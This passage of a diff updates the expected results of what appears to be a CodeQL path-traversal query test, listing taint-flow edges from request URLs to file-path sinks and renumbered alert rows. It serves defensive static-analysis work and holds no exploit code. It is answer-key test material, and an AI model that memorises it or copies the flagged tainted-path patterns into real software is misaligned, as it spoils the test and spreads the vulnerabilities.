TaintedPath.js:137:28:137:32 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:139:33:139:37 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:142:20:142:24 | split | provenance | | -| TaintedPath.js:130:7:130:29 | split | TaintedPath.js:145:19:145:23 | split | provenance | | -| TaintedPath.js:130:15:130:18 | path | TaintedPath.js:130:15:130:29 | path.split("/") | provenance | Config | -| TaintedPath.js:130:15:130:29 | path.split("/") | TaintedPath.js:130:7:130:29 | split | provenance | | -| TaintedPath.js:132:19:132:23 | split | TaintedPath.js:132:19:132:33 | split.join("/") | provenance | Config | -| TaintedPath.js:136:19:136:23 | split | TaintedPath.js:136:19:136:26 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:32 | split | TaintedPath.js:137:28:137:35 | split[x] | provenance | Config | -| TaintedPath.js:137:28:137:35 | split[x] | TaintedPath.js:137:19:137:35 | prefix + split[x] | provenance | Config | -| TaintedPath.js:139:7:139:38 | concatted | TaintedPath.js:140:19:140:27 | concatted | provenance | | -| TaintedPath.js:139:19:139:38 | prefix.concat(split) | TaintedPath.js:139:7:139:38 | concatted | provenance | | -| TaintedPath.js:139:33:139:37 | split | TaintedPath.js:139:19:139:38 | prefix.concat(split) | provenance | Config | -| TaintedPath.js:140:19:140:27 | concatted | TaintedPath.js:140:19:140:37 | concatted.join("/") | provenance | Config | -| TaintedPath.js:142:7:142:39 | concatted2 | TaintedPath.js:143:19:143:28 | concatted2 | provenance | | -| TaintedPath.js:142:20:142:24 | split | TaintedPath.js:142:20:142:39 | split.concat(prefix) | provenance | Config | -| TaintedPath.js:142:20:142:39 | split.concat(prefix) | TaintedPath.js:142:7:142:39 | concatted2 | provenance | | -| TaintedPath.js:143:19:143:28 | concatted2 | TaintedPath.js:143:19:143:38 | concatted2.join("/") | provenance | Config | -| TaintedPath.js:145:19:145:23 | split | TaintedPath.js:145:19:145:29 | split.pop() | provenance | Config | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:154:29:154:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:160:29:160:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:161:29:161:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:162:29:162:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:163:29:163:32 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:178:40:178:43 | path | provenance | | -| TaintedPath.js:150:7:150:48 | path | TaintedPath.js:179:50:179:53 | path | provenance | | -| TaintedPath.js:150:14:150:37 | url.par ... , true) | TaintedPath.js:150:14:150:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:150:14:150:43 | url.par ... ).query | TaintedPath.js:150:14:150:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:150:14:150:48 | url.par ... ry.path | TaintedPath.js:150:7:150:48 | path | provenance | | -| TaintedPath.js:150:24:150:30 | req.url | TaintedPath.js:150:14:150:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:154:29:154:32 | path | TaintedPath.js:154:29:154:55 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:160:29:160:32 | path | TaintedPath.js:160:29:160:52 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:161:29:161:32 | path | TaintedPath.js:161:29:161:53 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:162:29:162:32 | path | TaintedPath.js:162:29:162:51 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:163:29:163:32 | path | TaintedPath.js:163:29:163:57 | path.re ... /g, '') | provenance | Config | -| TaintedPath.js:178:40:178:43 | path | TaintedPath.js:178:40:178:73 | path.re ... +/, '') | provenance | Config | -| TaintedPath.js:178:40:178:73 | path.re ... +/, '') | TaintedPath.js:178:29:178:73 | "prefix ... +/, '') | provenance | Config | -| TaintedPath.js:179:29:179:54 | pathMod ... e(path) | TaintedPath.js:179:29:179:84 | pathMod ... +/, '') | provenance | Config | -| TaintedPath.js:179:50:179:53 | path | TaintedPath.js:179:29:179:54 | pathMod ... e(path) | provenance | Config | -| TaintedPath.js:187:29:187:45 | qs.parse(req.url) | TaintedPath.js:187:29:187:49 | qs.pars ... rl).foo | provenance | Config | -| TaintedPath.js:187:38:187:44 | req.url | TaintedPath.js:187:29:187:45 | qs.parse(req.url) | provenance | Config | -| TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | TaintedPath.js:188:29:188:63 | qs.pars ... l)).foo | provenance | Config | -| TaintedPath.js:188:38:188:58 | normali ... eq.url) | TaintedPath.js:188:29:188:59 | qs.pars ... q.url)) | provenance | Config | -| TaintedPath.js:188:51:188:57 | req.url | TaintedPath.js:188:38:188:58 | normali ... eq.url) | provenance | Config | -| TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | TaintedPath.js:190:29:190:55 | parseqs ... rl).foo | provenance | Config | -| TaintedPath.js:190:44:190:50 | req.url | TaintedPath.js:190:29:190:51 | parseqs ... eq.url) | provenance | Config | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:196:31:196:34 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:197:45:197:48 | path | provenance | | -| TaintedPath.js:195:7:195:48 | path | TaintedPath.js:198:35:198:38 | path | provenance | | -| TaintedPath.js:195:14:195:37 | url.par ... , true) | TaintedPath.js:195:14:195:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:195:14:195:43 | url.par ... ).query | TaintedPath.js:195:14:195:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:195:14:195:48 | url.par ... ry.path | TaintedPath.js:195:7:195:48 | path | provenance | | -| TaintedPath.js:195:24:195:30 | req.url | TaintedPath.js:195:14:195:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:202:7:202:48 | path | TaintedPath.js:206:29:206:32 | path | provenance | | -| TaintedPath.js:202:14:202:37 | url.par ... , true) | TaintedPath.js:202:14:202:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:202:14:202:43 | url.par ... ).query | TaintedPath.js:202:14:202:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:202:14:202:48 | url.par ... ry.path | TaintedPath.js:202:7:202:48 | path | provenance | | -| TaintedPath.js:202:24:202:30 | req.url | TaintedPath.js:202:14:202:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:206:29:206:32 | path | TaintedPath.js:206:29:206:85 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:213:29:213:32 | path | provenance | | -| TaintedPath.js:211:7:211:48 | path | TaintedPath.js:216:31:216:34 | path | provenance | | -| TaintedPath.js:211:14:211:37 | url.par ... , true) | TaintedPath.js:211:14:211:43 | url.par ... ).query | provenance | Config | -| TaintedPath.js:211:14:211:43 | url.par ... ).query | TaintedPath.js:211:14:211:48 | url.par ... ry.path | provenance | Config | -| TaintedPath.js:211:14:211:48 | url.par ... ry.path | TaintedPath.js:211:7:211:48 | path | provenance | | -| TaintedPath.js:211:24:211:30 | req.url | TaintedPath.js:211:14:211:37 | url.par ... , true) | provenance | Config | -| TaintedPath.js:213:29:213:32 | path | TaintedPath.js:213:29:213:68 | path.re ... '), '') | provenance | Config | -| TaintedPath.js:216:31:216:34 | path | TaintedPath.js:216:31:216:69 | path.re ... '), '') | provenance | Config | -| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:11:36:11:43 | filePath | provenance | | +| TaintedPath.js:13:45:13:48 | path | TaintedPath.js:13:29:13:48 | "/home/user/" + path | provenance | Config | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:39:48:39:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:42:45:42:48 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:43:51:43:54 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:44:50:44:53 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:45:52:45:55 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:46:49:46:52 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:47:48:47:51 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:48:54:48:57 | path | provenance | | +| TaintedPath.js:36:3:36:44 | path | TaintedPath.js:49:57:49:60 | path | provenance | | +| TaintedPath.js:36:10:36:33 | url.par ... , true) | TaintedPath.js:36:10:36:39 | url.par ... ).query | provenance | Config | +| TaintedPath.js:36:10:36:39 | url.par ... ).query | TaintedPath.js:36:10:36:44 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:36:10:36:44 | url.par ... ry.path | TaintedPath.js:36:3:36:44 | path | provenance | | +| TaintedPath.js:36:20:36:26 | req.url | TaintedPath.js:36:10:36:33 | url.par ... , true) | provenance | Config | +| TaintedPath.js:39:48:39:51 | path | TaintedPath.js:39:29:39:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:42:45:42:48 | path | TaintedPath.js:42:29:42:49 | pathMod ... n(path) | provenance | Config | +| TaintedPath.js:43:51:43:54 | path | TaintedPath.js:43:29:43:58 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:44:50:44:53 | path | TaintedPath.js:44:29:44:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:45:52:45:55 | path | TaintedPath.js:45:29:45:56 | pathMod ... , path) | provenance | Config | +| TaintedPath.js:46:49:46:52 | path | TaintedPath.js:46:29:46:56 | pathMod ... ath, x) | provenance | Config | +| TaintedPath.js:47:48:47:51 | path | TaintedPath.js:47:29:47:52 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:48:54:48:57 | path | TaintedPath.js:48:29:48:61 | pathMod ... ath, z) | provenance | Config | +| TaintedPath.js:49:57:49:60 | path | TaintedPath.js:49:29:49:61 | pathMod ... h(path) | provenance | Config | +| TaintedPath.js:54:31:54:70 | require ... eq.url) | TaintedPath.js:54:31:54:76 | require ... ).query | provenance | Config | +| TaintedPath.js:54:63:54:69 | req.url | TaintedPath.js:54:31:54:70 | require ... eq.url) | provenance | Config | +| TaintedPath.js:55:31:55:68 | require ... eq.url) | TaintedPath.js:55:31:55:74 | require ... ).query | provenance | Config | +| TaintedPath.js:55:61:55:67 | req.url | TaintedPath.js:55:31:55:68 | require ... eq.url) | provenance | Config | +| TaintedPath.js:56:31:56:67 | require ... eq.url) | TaintedPath.js:56:31:56:73 | require ... ).query | provenance | Config | +| TaintedPath.js:56:60:56:66 | req.url | TaintedPath.js:56:31:56:67 | require ... eq.url) | provenance | Config | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:75:44:75:47 | path | provenance | | +| TaintedPath.js:73:6:73:47 | path | TaintedPath.js:76:14:76:17 | path | provenance | | +| TaintedPath.js:73:13:73:36 | url.par ... , true) | TaintedPath.js:73:13:73:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:73:13:73:42 | url.par ... ).query | TaintedPath.js:73:13:73:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:73:13:73:47 | url.par ... ry.path | TaintedPath.js:73:6:73:47 | path | provenance | | +| TaintedPath.js:73:23:73:29 | req.url | TaintedPath.js:73:13:73:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:75:44:75:47 | path | TaintedPath.js:75:28:75:48 | fs.real ... c(path) | provenance | Config | +| TaintedPath.js:76:14:76:17 | path | TaintedPath.js:77:32:77:39 | realpath | provenance | Config | +| TaintedPath.js:77:32:77:39 | realpath | TaintedPath.js:78:45:78:52 | realpath | provenance | | +| TaintedPath.js:109:6:109:47 | path | TaintedPath.js:111:23:111:26 | path | provenance | | +| TaintedPath.js:109:13:109:36 | url.par ... , true) | TaintedPath.js:109:13:109:42 | url.par ... ).query | provenance | Config | +| TaintedPath.js:109:13:109:42 | url.par ... ).query | TaintedPath.js:109:13:109:47 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:109:13:109:47 | url.par ... ry.path | TaintedPath.js:109:6:109:47 | path | provenance | | +| TaintedPath.js:109:23:109:29 | req.url | TaintedPath.js:109:13:109:36 | url.par ... , true) | provenance | Config | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:117:19:117:22 | path | provenance | | +| TaintedPath.js:115:7:115:48 | path | TaintedPath.js:119:15:119:18 | path | provenance | | +| TaintedPath.js:115:14:115:37 | url.par ... , true) | TaintedPath.js:115:14:115:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:115:14:115:43 | url.par ... ).query | TaintedPath.js:115:14:115:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:115:14:115:48 | url.par ... ry.path | TaintedPath.js:115:7:115:48 | path | provenance | | +| TaintedPath.js:115:24:115:30 | req.url | TaintedPath.js:115:14:115:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:121:19:121:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:125:19:125:23 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:126:28:126:32 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:128:33:128:37 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:131:20:131:24 | split | provenance | | +| TaintedPath.js:119:7:119:29 | split | TaintedPath.js:134:19:134:23 | split | provenance | | +| TaintedPath.js:119:15:119:18 | path | TaintedPath.js:119:15:119:29 | path.split("/") | provenance | Config | +| TaintedPath.js:119:15:119:29 | path.split("/") | TaintedPath.js:119:7:119:29 | split | provenance | | +| TaintedPath.js:121:19:121:23 | split | TaintedPath.js:121:19:121:33 | split.join("/") | provenance | Config | +| TaintedPath.js:125:19:125:23 | split | TaintedPath.js:125:19:125:26 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:32 | split | TaintedPath.js:126:28:126:35 | split[x] | provenance | Config | +| TaintedPath.js:126:28:126:35 | split[x] | TaintedPath.js:126:19:126:35 | prefix + split[x] | provenance | Config | +| TaintedPath.js:128:7:128:38 | concatted | TaintedPath.js:129:19:129:27 | concatted | provenance | | +| TaintedPath.js:128:19:128:38 | prefix.concat(split) | TaintedPath.js:128:7:128:38 | concatted | provenance | | +| TaintedPath.js:128:33:128:37 | split | TaintedPath.js:128:19:128:38 | prefix.concat(split) | provenance | Config | +| TaintedPath.js:129:19:129:27 | concatted | TaintedPath.js:129:19:129:37 | concatted.join("/") | provenance | Config | +| TaintedPath.js:131:7:131:39 | concatted2 | TaintedPath.js:132:19:132:28 | concatted2 | provenance | | +| TaintedPath.js:131:20:131:24 | split | TaintedPath.js:131:20:131:39 | split.concat(prefix) | provenance | Config | +| TaintedPath.js:131:20:131:39 | split.concat(prefix) | TaintedPath.js:131:7:131:39 | concatted2 | provenance | | +| TaintedPath.js:132:19:132:28 | concatted2 | TaintedPath.js:132:19:132:38 | concatted2.join("/") | provenance | Config | +| TaintedPath.js:134:19:134:23 | split | TaintedPath.js:134:19:134:29 | split.pop() | provenance | Config | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:143:29:143:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:149:29:149:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:150:29:150:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:151:29:151:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:152:29:152:32 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:167:40:167:43 | path | provenance | | +| TaintedPath.js:139:7:139:48 | path | TaintedPath.js:168:50:168:53 | path | provenance | | +| TaintedPath.js:139:14:139:37 | url.par ... , true) | TaintedPath.js:139:14:139:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:139:14:139:43 | url.par ... ).query | TaintedPath.js:139:14:139:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:139:14:139:48 | url.par ... ry.path | TaintedPath.js:139:7:139:48 | path | provenance | | +| TaintedPath.js:139:24:139:30 | req.url | TaintedPath.js:139:14:139:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:143:29:143:32 | path | TaintedPath.js:143:29:143:55 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:149:29:149:32 | path | TaintedPath.js:149:29:149:52 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:150:29:150:32 | path | TaintedPath.js:150:29:150:53 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:151:29:151:32 | path | TaintedPath.js:151:29:151:51 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:152:29:152:32 | path | TaintedPath.js:152:29:152:57 | path.re ... /g, '') | provenance | Config | +| TaintedPath.js:167:40:167:43 | path | TaintedPath.js:167:40:167:73 | path.re ... +/, '') | provenance | Config | +| TaintedPath.js:167:40:167:73 | path.re ... +/, '') | TaintedPath.js:167:29:167:73 | "prefix ... +/, '') | provenance | Config | +| TaintedPath.js:168:29:168:54 | pathMod ... e(path) | TaintedPath.js:168:29:168:84 | pathMod ... +/, '') | provenance | Config | +| TaintedPath.js:168:50:168:53 | path | TaintedPath.js:168:29:168:54 | pathMod ... e(path) | provenance | Config | +| TaintedPath.js:176:29:176:45 | qs.parse(req.url) | TaintedPath.js:176:29:176:49 | qs.pars ... rl).foo | provenance | Config | +| TaintedPath.js:176:38:176:44 | req.url | TaintedPath.js:176:29:176:45 | qs.parse(req.url) | provenance | Config | +| TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | TaintedPath.js:177:29:177:63 | qs.pars ... l)).foo | provenance | Config | +| TaintedPath.js:177:38:177:58 | normali ... eq.url) | TaintedPath.js:177:29:177:59 | qs.pars ... q.url)) | provenance | Config | +| TaintedPath.js:177:51:177:57 | req.url | TaintedPath.js:177:38:177:58 | normali ... eq.url) | provenance | Config | +| TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | TaintedPath.js:179:29:179:55 | parseqs ... rl).foo | provenance | Config | +| TaintedPath.js:179:44:179:50 | req.url | TaintedPath.js:179:29:179:51 | parseqs ... eq.url) | provenance | Config | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:185:31:185:34 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:186:45:186:48 | path | provenance | | +| TaintedPath.js:184:7:184:48 | path | TaintedPath.js:187:35:187:38 | path | provenance | | +| TaintedPath.js:184:14:184:37 | url.par ... , true) | TaintedPath.js:184:14:184:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:184:14:184:43 | url.par ... ).query | TaintedPath.js:184:14:184:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:184:14:184:48 | url.par ... ry.path | TaintedPath.js:184:7:184:48 | path | provenance | | +| TaintedPath.js:184:24:184:30 | req.url | TaintedPath.js:184:14:184:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:191:7:191:48 | path | TaintedPath.js:195:29:195:32 | path | provenance | | +| TaintedPath.js:191:14:191:37 | url.par ... , true) | TaintedPath.js:191:14:191:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:191:14:191:43 | url.par ... ).query | TaintedPath.js:191:14:191:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:191:14:191:48 | url.par ... ry.path | TaintedPath.js:191:7:191:48 | path | provenance | | +| TaintedPath.js:191:24:191:30 | req.url | TaintedPath.js:191:14:191:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:195:29:195:32 | path | TaintedPath.js:195:29:195:85 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:202:29:202:32 | path | provenance | | +| TaintedPath.js:200:7:200:48 | path | TaintedPath.js:205:31:205:34 | path | provenance | | +| TaintedPath.js:200:14:200:37 | url.par ... , true) | TaintedPath.js:200:14:200:43 | url.par ... ).query | provenance | Config | +| TaintedPath.js:200:14:200:43 | url.par ... ).query | TaintedPath.js:200:14:200:48 | url.par ... ry.path | provenance | Config | +| TaintedPath.js:200:14:200:48 | url.par ... ry.path | TaintedPath.js:200:7:200:48 | path | provenance | | +| TaintedPath.js:200:24:200:30 | req.url | TaintedPath.js:200:14:200:37 | url.par ... , true) | provenance | Config | +| TaintedPath.js:202:29:202:32 | path | TaintedPath.js:202:29:202:68 | path.re ... '), '') | provenance | Config | +| TaintedPath.js:205:31:205:34 | path | TaintedPath.js:205:31:205:69 | path.re ... '), '') | provenance | Config | +| examples/TaintedPath.js:8:7:8:52 | filePath | examples/TaintedPath.js:10:36:10:43 | filePath | provenance | | | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | provenance | Config | | examples/TaintedPath.js:8:18:8:47 | url.par ... ).query | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | provenance | Config | | examples/TaintedPath.js:8:18:8:52 | url.par ... ry.path | examples/TaintedPath.js:8:7:8:52 | filePath | provenance | | | examples/TaintedPath.js:8:28:8:34 | req.url | examples/TaintedPath.js:8:18:8:41 | url.par ... , true) | provenance | Config | -| examples/TaintedPath.js:11:36:11:43 | filePath | examples/TaintedPath.js:11:29:11:43 | ROOT + filePath | provenance | Config | +| examples/TaintedPath.js:10:36:10:43 | filePath | examples/TaintedPath.js:10:29:10:43 | ROOT + filePath | provenance | Config | | handlebars.js:10:51:10:58 | filePath | handlebars.js:11:32:11:39 | filePath | provenance | | | handlebars.js:13:73:13:80 | filePath | handlebars.js:15:25:15:32 | filePath | provenance | | | handlebars.js:29:46:29:60 | req.params.path | handlebars.js:10:51:10:58 | filePath | provenance | | @@ -899,10 +899,10 @@ edges | tainted-promise-steps.js:11:25:11:35 | pathPromise [PromiseValue] | tainted-promise-steps.js:11:19:11:35 | await pathPromise | provenance | | | tainted-promise-steps.js:12:3:12:13 | pathPromise [PromiseValue] | tainted-promise-steps.js:12:20:12:23 | path | provenance | | | tainted-promise-steps.js:12:20:12:23 | path | tainted-promise-steps.js:12:44:12:47 | path | provenance | | -| tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | provenance | Config | -| tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | provenance | Config | -| tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | provenance | Config | -| tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | provenance | Config | +| tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | provenance | Config | +| tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | provenance | Config | +| tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | provenance | Config | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:8:18:8:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:9:18:9:21 | path | provenance | | | tainted-string-steps.js:6:7:6:48 | path | tainted-string-steps.js:10:18:10:21 | path | provenance | | @@ -944,69 +944,69 @@ edges | torrents.js:6:6:6:45 | loc | torrents.js:7:25:7:27 | loc | provenance | | | torrents.js:6:12:6:45 | dir + " ... t.data" | torrents.js:6:6:6:45 | loc | provenance | | | torrents.js:6:24:6:27 | name | torrents.js:6:12:6:45 | dir + " ... t.data" | provenance | Config | -| typescript.ts:9:7:9:48 | path | typescript.ts:12:29:12:32 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:20:15:20:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:23:15:23:18 | path | provenance | | -| typescript.ts:9:7:9:48 | path | typescript.ts:30:15:30:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:11:29:11:32 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:19:15:19:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:22:15:22:18 | path | provenance | | +| typescript.ts:9:7:9:48 | path | typescript.ts:29:15:29:18 | path | provenance | | | typescript.ts:9:14:9:37 | url.par ... , true) | typescript.ts:9:14:9:43 | url.par ... ).query | provenance | Config | | typescript.ts:9:14:9:43 | url.par ... ).query | typescript.ts:9:14:9:48 | url.par ... ry.path | provenance | Config | | typescript.ts:9:14:9:48 | url.par ... ry.path | typescript.ts:9:7:9:48 | path | provenance | | | typescript.ts:9:24:9:30 | req.url | typescript.ts:9:14:9:37 | url.par ... , true) | provenance | Config | -| typescript.ts:20:7:20:18 | path3 | typescript.ts:21:39:21:43 | path3 | provenance | | -| typescript.ts:20:15:20:18 | path | typescript.ts:20:7:20:18 | path3 | provenance | | -| typescript.ts:23:7:23:18 | path4 | typescript.ts:24:39:24:43 | path4 | provenance | | -| typescript.ts:23:15:23:18 | path | typescript.ts:23:7:23:18 | path4 | provenance | | -| typescript.ts:30:7:30:18 | path6 | typescript.ts:32:29:32:33 | path6 | provenance | | -| typescript.ts:30:15:30:18 | path | typescript.ts:30:7:30:18 | path6 | provenance | | +| typescript.ts:19:7:19:18 | path3 | typescript.ts:20:39:20:43 | path3 | provenance | | +| typescript.ts:19:15:19:18 | path | typescript.ts:19:7:19:18 | path3 | provenance | | +| typescript.ts:22:7:22:18 | path4 | typescript.ts:23:39:23:43 | path4 | provenance | | +| typescript.ts:22:15:22:18 | path | typescript.ts:22:7:22:18 | path4 | provenance | | +| typescript.ts:29:7:29:18 | path6 | typescript.ts:31:29:31:33 | path6 | provenance | | +| typescript.ts:29:15:29:18 | path | typescript.ts:29:7:29:18 | path6 | provenance | | subpaths #select -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:10:26:10:45 | join("public", path) | This path depends on a $@. | TaintedPath-es6.js:7:20:7:26 | req.url | user-provided value | -| TaintedPath.js:12:29:12:32 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:12:29:12:32 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:15:29:15:48 | "/home/user/" + path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:18:33:18:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:18:33:18:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:21:33:21:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:21:33:21:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:24:33:24:36 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:24:33:24:36 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:33:31:33:34 | path | TaintedPath.js:9:24:9:30 | req.url | TaintedPath.js:33:31:33:34 | path | This path depends on a $@. | TaintedPath.js:9:24:9:30 | req.url | user-provided value | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:42:29:42:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:46:29:46:49 | pathMod ... n(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:50:29:50:54 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:52:29:52:56 | pathMod ... , path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:56:29:56:52 | pathMod ... e(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:58:29:58:61 | pathMod ... ath, z) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:60:29:60:61 | pathMod ... h(path) | TaintedPath.js:38:20:38:26 | req.url | TaintedPath.js:60:29:60:61 | pathMod ... h(path) | This path depends on a $@. | TaintedPath.js:38:20:38:26 | req.url | user-provided value | -| TaintedPath.js:65:31:65:76 | require ... ).query | TaintedPath.js:65:63:65:69 